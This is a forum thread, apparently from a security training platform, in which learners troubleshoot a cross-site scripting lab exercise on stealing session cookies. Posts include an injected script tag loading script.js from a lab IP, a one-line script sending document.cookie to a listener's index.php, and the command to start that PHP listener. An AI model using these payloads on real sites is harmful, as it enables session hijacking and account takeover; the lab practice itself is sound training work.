I’ve been trying for hours now to get this very simple exercise done. Luckily, the VPN doesn’t work (after wasting a lot of time on trying to get it working properly), so I was able to just type everything directly into the PwnBox.
I’m able to get the script.js to download but after that, the site never reaches back out for index.php. After reading the forums, it seems that I’m not alone. Is there a way to get around this? Because the HTB infrastructure is broken, I think there’s got to be a different way than the obvious, simple solution.
Hey dude! Sorry that you have been having a rough go of it. Paste the XSS line you are injecting into the form so we can help you. Edit: Paste the contents of your script.js too, that might be the issue.
On a separate note, what errors were you getting with the VPN?
No problem. I used both of these along with the dynamically assigned IP:
These were both tried as the contents of script.js. I even put <script>...stuff...</script> tags around it just in case I was missing something.
Then the XSS payload in the image field was updated to ...imgurl="><script src=http://IP:8080/script.js></script>. The XSS was successful and reached back to the PHP server I instantiated to grab the script. After that, silence. There was never a call to hit index.php (which was also in the same local directory as
The VPN is as unstable as a one-legged stool. It drops for no reason (even though it’s configured as a VPN Connection in Kali’s network configuration settings). When it does work, it’s a hope and prayer that I will actually be able to connect to the resources. Sometimes they just time out and I get no response; other times it takes an incredible amount of time to load a resource/page; other times it works speedily with no problems. Pentesting is difficult enough as it is - it’s incredibly frustrating to drain even more time and mental bandwidth constantly chasing my tail in order to get basic resources to function properly. I have tried both US1 and US2 for endpoints.
Thanks for reaching out.
Alright, so your script.js looks like it should be good, as long as one of those is in there with the right IP:PORT. And then just make sure the index.php file is created without changes from the code they supply.
The XSS payload can probably look more like just this though. Though it might be a spoiler if you didn’t try all the payloads.
Guessing that you already made sure you were using the right field to complete the challenge? As only one field actually works from what I have found.
On the VPN topic. You shouldn’t need to configure anything to get the VPN to work. The VPN profile should be downloaded as something like username.ovpn and then you should just open a CLI and run (maybe as root or with sudo)
At least that’s all I have ever done when I have used it and it has worked fine for me.
Give that XSS another go and if it still doesn’t work post screenshots of your XSS payload and script.js.
I have been noticing that the new PwnBoxes default to the /root directory, make sure that you are in the default home directory. That just got me when I started it up and did the challenge. Everything seems to be working fine on the backend though.
hello @onthesauce !!
Still I am facing the same issue as specified by Joe earlier. My script.js looks like this: new Image().src=‘http:/10.10.14.111:89/index.php?c=’+document.cookie; and my index.php is the one which they supplied (I use the code as it is). Both index.php and script.js are located in the same directory /tmp/tmpserver…
And I start the PHP server using- sudo php -S 10.10.14.111:89…
I enter the payload as "> in the vulnerable field of the application. I get a callback on my PHP server only for script.js as shown in the attached pic and not for index.php.
Also one query is after uploading my payloads in the vuln field and the app shows as “Thank you for registering”, post this do I need to copy the entire URL of the application with the submitted payload and then again load this copied URL in the browser to get the cookie?
Request you to please support me on this as I’ve been banging my head for 2 months. Earlier you helped me out in one of the labs too, so I would appreciate it if you could support here.
I solved it thanks!!! @onthesauce
Hey no worries! Where was your problem?
Not sure though. The methodology was correct, but this time I started fresh and it suddenly worked out for good!
Thanks though for checking!
I am yet to solve many modules from now on, so no wonder I’ll catch up with you very soon mate!!!
Please stay in touch and massive respect!
Merry Christmas💥 @onthesauce
FOR FUTURE REFERENCE: make sure you put the port number in your script.js file…
You seem to have an excellent grasp on this. I am insanely stuck. I have followed all the steps, followed all the help, used the correct syntax and everything, but I don’t seem to get a response after I send the payload through. Please help!
Thanks and no worries, XSS is a crazy hard module! DM me the steps you have gone through and the payload that you are submitting. I will double check it and see if I can help you out.
For those who encounter the problem: “(null) /script” I have a suggestion for you that you should start the php server listening in the directory where you are creating the script.js file. I had this problem before and tried again and it worked.